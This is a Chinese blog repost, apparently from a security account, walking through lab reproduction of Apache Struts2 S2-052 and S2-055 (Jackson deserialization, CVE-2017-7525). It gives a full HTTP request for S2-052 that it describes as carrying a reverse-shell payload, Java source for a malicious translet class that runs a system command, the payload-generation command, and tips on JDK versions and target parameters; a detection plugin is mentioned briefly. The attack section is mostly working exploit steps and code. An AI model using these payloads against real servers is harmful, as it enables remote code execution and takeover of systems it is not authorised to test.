webbrowse提示版本过低_Structs全版本漏洞利用总结

最新推荐文章于 2024-02-20 11:24:44 发布
最新推荐文章于 2024-02-20 11:24:44 发布
阅读量252 收藏
点赞数
文章标签: webbrowse提示版本过低

本文转自公众号:安全祖师爷

前言

Struts2框架目前已知的漏洞编号如下:

  • S2-005

  • S2-009

  • S2-016 (含S2-013)

  • S2-019

  • S2-020

  • S2-021

  • S2-032

  • S2-037(含S2-033)

  • DevMode

  • S2-045

  • S2-046

  • S2-048

  • S2-052

  • S2-055

  • S2-057

目前公开的工具,唯独缺失052和055的利用。S2-055比较特殊,严格来说055本身无问题,问题出在其使用的Jackson版本过低在进行JSON反序列化的时候没有任何类型过滤导致远程代码执行。也就是说S2-055本质上是Jackson反序列化,其CVE编号为CVE-2017-7525。本文将对缺失的S2-055以及S2-052做漏洞复现,至于其他版本的利用可参见下图的工具。

6520f62be97e408dd66410c59875b529.png

检测工具

S2-052

使用搭建的环境,点击任意一个edit并submit一次,截包报文,修改Content-Typeapplication/xml

7597f14498af69f8919176f89753f243.png

Edit

b2187e723314cbd36479c6ff08ce2883.png

Submit

0caa29492cf16407762a7c5673077f8d.png

application/xml

完整的数据包payload如下

POST /st2-052/orders/5 HTTP/1.1Host: 192.168.50.129:8080Content-Length: 1720Cache-Control: max-age=0Origin: http://192.168.50.129:8080Upgrade-Insecure-Requests: 1Content-Type: application/xmlUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Referer: http://192.168.50.129:8080/st2-052/orders/5/editAccept-Encoding: gzip, deflateAccept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6Cookie: JSESSIONID=1109456161E6ECD09D5B4A28122050D7; ADMINCONSOLESESSION=2hUOycdoVZXd7JWNrE9MQ5-QczsMItp1AJpSHSyKvb6U95SBCn8o!853562462; JSESSIONID=D1gPM88rMDIA-n-pCtKwlFFiNS6ewwWI5-qkkJ5NcDRbOIIZGq86!-1979873897Connection: close

我这里给出的是反弹shell的payload,你可以修改为自己想要执行的命令。

10b17b4ddb667afd6d1e57fdc84abbd5.png

弹shell

S2-055 && CVE-2017-7525

影响情况

受影响的版本
Jackson Version 2.7.* < 2.7.10
Jackson Version 2.8.* < 2.8.9

不受影响的版本
Jackson Version 2.7.10
Jackson Version 2.8.9

漏洞环境搭建

去iBearcat的gayhub下载漏洞war包
war包直链:

https://raw.githubusercontent.com/iBearcat/S2-055/master/struts2-rest-showcase.war
为了方便将其改名为st2-055.war,放到tomcat的webapps下,它会自动解压

a98d851c69f3ffdd9a198831c6e421d6.png

st2-055.war

我们访问http://ip:8080/st2-055/即可

6072c3dee1771556d6f26a8c1db41f82.png

访问

EXP准备

我们使用以下代码生成payload需要的class

ExploitCommand.javapackage exploit;import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.BufferedReader;import java.io.IOException;import java.io.InputStreamReader;public class ExploitCommand extends AbstractTranslet {    public ExploitCommand() throws Exception {        try {            BufferedReader br = null;            Process p = Runtime.getRuntime().exec("notepad");            br = new BufferedReader(new InputStreamReader(p.getInputStream()));            String line = null;            StringBuilder sb = new StringBuilder();            while((line = br.readLine()) != null) {                sb.append(line + "\n");                System.out.println(sb.toString());            }            System.out.println("\n[*] Payload it's ok!!!!");        } catch (IOException var5) {            var5.printStackTrace();        }    }    public static void main(String[] args) throws Exception {        new ExploitCommand();    }    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {    }    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {    }}

这里又调用了JavaRuntime的exec了,所以如果你需要执行复杂命令,你需要使用JavaRuntime转义

运行上面的代码,你的编译环境如果匹配你想要执行的命令,编译机器同样也会执行相应的命令。举个例子,你的编译环境是win,但你编译的命令是nautilus,你编译时控制台会发生报错,找不到这个program。没关系,我们需要编译以后的class就行了,不需要真的在编译环境执行命令。

4fff9240ff0b754fcc976ced079c6d22.png

编译以后的class

接下来,我们需要准备生成payload的项目
iBearcat已经准备好了生成需要用的jar,但是兼容性有问题,它并不能用在Unix上,也就是macOS和Linux被拒之门外。

f39f007a70b111c430f27ea167ee0556.png

兼容性问题

我尝试对该jar包反编译,发现了问题所在。

9cf869e3eca4082baf90f963faff9639.png

问题所在

44eb6a2e6a30d949e3bc5362f4ac6646.png

问题所在

没错,问题出在那个斜杠上面,我们只需要\改为//即可。

5c1c3bb58a2b78be3a588fef4af51420.png

macOS

54a4e6ca7f70d4c8d06c768381acc5a7.png

Win10

经过我反编译以后,重新打包,可以正常使用并且兼容两个版本。
payload生成的命令为:java -jar JacksonExp.jar ExploitCommand.class clientName

坑点
1.tomcat的用户

首先,如果你需要做一些弹出类的命令操作,一定要记得选择压缩包版本的tomcat,因为压缩包版的用户是你的系统用户。假如你在root下运行tomcat,此时你tomcat的用户也是root。但如果你使用的是yum或者apt安装的tomcat,它的用户将是tomcat,所以你不能执行一些弹出类的命令,例如nautilus

2.ExploitCommand.class的编译

ExploitCommand.class是直接决定你能否exploit成功的关键。ExploitCommand.class编译时的jdk版本一定要和靶机的jdk版本一致,也就是说要成功利用反序列化,jdk必须为<=1.7.不论是编译jdk还是靶机jdk都需要为<=1.7.具体原因是jdk1.7到jdk1.8,com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl类有了变化,才导致反序列化利用失败的。

弹个文件管理器

解决了坑点问题,我们就可以愉快的弹出文件管理器了。
首先,我们点击Create a new order

13053b142efea883c4f03b3d72b25d33.png

Create a new order

然后点击Submit使用Burpsuite拦截报文

2f31571f6b795b5d224115cd9c1dfb4d.png

Submit

我们修改Content-Type的值为application/json,且将JacksonExp.jar生成的payload粘贴到下方即可

bbcac3f9c87cfe6c3018305c6822b6be.png

Content-Type

然后点击go即可弹出文件管理器

c7428366e781346f5cec61c6828b5d8b.png

弹出文件管理器

我们的控制台会有相应的提示

6a2b7a575e9029f9fa9b57b788c5e69a.png

控制台

检测方法

e137f6e66b6f5f08aa552ae909c24178.png

Freddy 2.0

目前Jackson类的漏洞,最好的检测方式就是使用BurpSuite安装Freddy 2.0这个插件,它会自动基于流量进行识别。

利用难点

S2-055这个漏洞,利用极为苛刻,因为jdk限制版本且需要有一个参数满足是对象类的条件。因为漏洞环境给出的参数为clientName,所以为什么生成payload命令的参数填写的是clientName。在实战时,要根据实际的参数进行调整。也许这就是为什么055缺失在一键化工具中的原因吧。

参考

https://github.com/iBearcat/S2-055

相关操作学习推荐

Struts2(S2-016/17)漏洞实验本实验分析了struts2 的漏洞s2-016/017的形成原因,并复现该漏洞。点击文末“

1e7a006f0666656c27dd218eb025a37f.png

b2ad6b6a60da8b3ac70f584a61326e4a.gif

别忘了投稿哦

大家有好的技术原创文章

欢迎投稿至邮箱:edu@heetian.com

合天会根据文章的时效、新颖、文笔、实用等多方面评判给予100元-500元不等的稿费哦

有才能的你快来投稿吧!

了解投稿详情点击重金悬赏 | 合天原创投稿等你来!

d263392b1479309b605213373d468458.gif

12d8e80d6e31ad9948ed8f3c00f0a674.gif点击“阅读全文”,开始操作
weixin_39629947
关注
简单的web漏洞攻击方式
qq_43772826的博客
06-11 671
xss 跨站脚本攻击(Cross site Scripting) 往Web页面里插入恶意代码,当用户浏览该页面时,嵌入其中的恶意代码就会执行,从而达到恶意用户的特殊目的。 危害:钓鱼、蠕虫病毒、盗取用户密码、强迫用户输入等 webshell 什么是webshell? 通过web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制。 防止服务器被上传webshell 非法上传防护 已经被上传了webshell 1、黑客要利用此脚本 2、经典的webshell特征 3、先防护Response,后防护requ
C#_from做的webbrowse
09-03
总结来说,C#中的WebBrowser控件是一个强大的工具,它使得开发者能够轻松地在Windows Forms应用程序中集成网页浏览功能。通过理解和掌握它的基本用法以及相关事件,我们可以构建出定制化的网页浏览器,满足特定用户...
webbrowse提示版本过低_手机浏览器提示:您的手机可能遭到恶意代码攻击!这是怎么回事?...
weixin_39690391的博客
12-06 750
我的手机支付宝还有余额50分钱,我一直不放心,觉得世界75亿人口都对它虎视眈眈,想要瓜分这笔巨款!!这不,有一天手机弹出一个窗口,手机被恶意代码攻击!我的天,大事不好!这是怎么回事?一问朋友,发现大家都遇到过这三个“提示”,我们来看看!恶意代码攻击浏览器版本过低网站传播木马新型骗术这三类提示一般出现在我们使用浏览器的时候,有的朋友看到这类信息,还会小小的担心一下,误以为真。其实这是一种典型的诱导...
webbrowser只对浏览器外应用程序以及在_IE 一个漏洞遍布的浏览器(三)
weixin_39781209的博客
12-01 351
本质上,对象在较旧的文档模式中呈现为独立实体,但在较新的文档模式中呈现为iframe。无论如何,内部都是WebBrowser控件,Trident引擎暴露的成员属性都是相同的。但是当我们关闭兼容性代码时继承的窗口成员让我们回顾一个较旧的documentMode并找到一种方法来利用这个混乱错误,这似乎并不是那么糟糕,因为跨域限制仍然存在,并且X-FRAME-OPTIONS标题非常有效。像window....
browse.php?u,phpMyRecipes browse.php SQL注入漏洞
weixin_42506647的博客
04-01 161
phpMyRecipes browse.php SQL注入漏洞发表日期:2015-01-19 14:04:33phpMyRecipes browse.php SQL注入漏洞CVE-ID:CVE-2014-9440发布日期:2014-12-31更新日期:2015-01-12受影响系统:phpMyRecipes phpMyRecipes 1.2.2详细信息:phpMyRecipes是存储及检索食谱的应...
高级浏览器漏洞攻击包:BrowserExploit
weixin_34397291的博客
07-03 421
BrowserExploit是一种先进的浏览器漏洞攻击包(通常指利用浏览器的漏洞来渗透目标),常见的比如IE的漏洞都可能导致目标设备在访问恶意页面后直接被GETSHELL,另外其他的比如Flash漏洞也都是可以通过浏览器来触发的,因此也可纳于Browser Exploit范畴。Browser Exploit适用于内部和外部渗透测试,以帮助相关人员获取访问...
VB.programming.code.WebBrowser.Control.Development_ vb webbrowse
09-23
VB编程WebBrowser控件开发经典代码Classic VB programming code WebBrowser Control Development
C# WebBrowser 切换IE版本
01-24
默认情况下,它使用宿主计算机上安装的最新版本的Internet Explorer(IE)引擎来渲染网页。然而,有时为了兼容旧版网页或特定插件,开发者可能需要将`WebBrowser`控件设置为模拟特定版本的IE。本篇将详细介绍如何在...
WinForm开发中屏蔽WebBrowser脚本错误提示的方法
09-04
然而,在某些情况下,网页中的JavaScript脚本可能会出现错误,导致用户界面出现不期望的错误提示。为了解决这个问题,我们需要采取措施来屏蔽这些脚本错误提示,以保持良好的用户体验。 首先,我们尝试通过设置`...
delphi WebBrowse实例
01-03
这个"Delphi WebBrowse实例"是利用WebBrowser组件创建的一个简单应用,让我们一起深入了解一下如何在Delphi中使用WebBrowser组件以及相关的编程知识。 首先,WebBrowser组件是基于Internet Explorer内核的,它可以...
WebBrowse控件显示GIF动画_WebBrowse控件显示GIF动画_
10-03
WebBrowse控件显示GIF动画
常见web漏洞原理,危害,防御方法_常见web漏洞原理及危害和防御方法
Karka_的博客
06-08 541
web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。
十大常见web漏洞及防范
最新发布
z099164的博客
02-20 2211
互联网和Web技术广泛使用,使Web应用安所面临的挑战日益严峻,Web系统时时刻刻都在遭受各种攻击的威胁,在这种情况下,需要制定一个完整的Web攻击防御解决方案,通过安Web应用程序、Web服务器软件、Web防攻击设备共同配合,确保整个网站的安。此外 ,Web攻击防御是一个长期持续的工作,随着Web技术的发展和更新,Web攻击手段也不断发展,针对这些最新的安威胁,需要及时调整Web防护策略,确保Web攻击防御的主动性,使Web网站在一个安的环境中为企业和客户服务。否则,网络流量顺利通过。
struts漏洞总结
Fiverya的博客
01-17 2830
struts2漏洞,从S2-001到 S2-061,嘿嘿。
WebBrowser控件的常用方法、属性和事件
热门推荐
IT技术分享社区
08-19 2万+
1. 属性属性说明Application如果该对象有效,则返回掌管WebBrowser控件的应用程序实现的自动化对象(IDispatch)。如果在宿主对象中自动化对象无效...
(45.4)【API接口漏洞】API接口常见的漏洞、owasp API 漏洞Top10
05-07 3171
【API接口漏洞】Top10
Struts2漏洞复现合集
weixin_42345596的博客
07-11 2963
1. Struts2简介 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的新的Struts 2框架。其新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值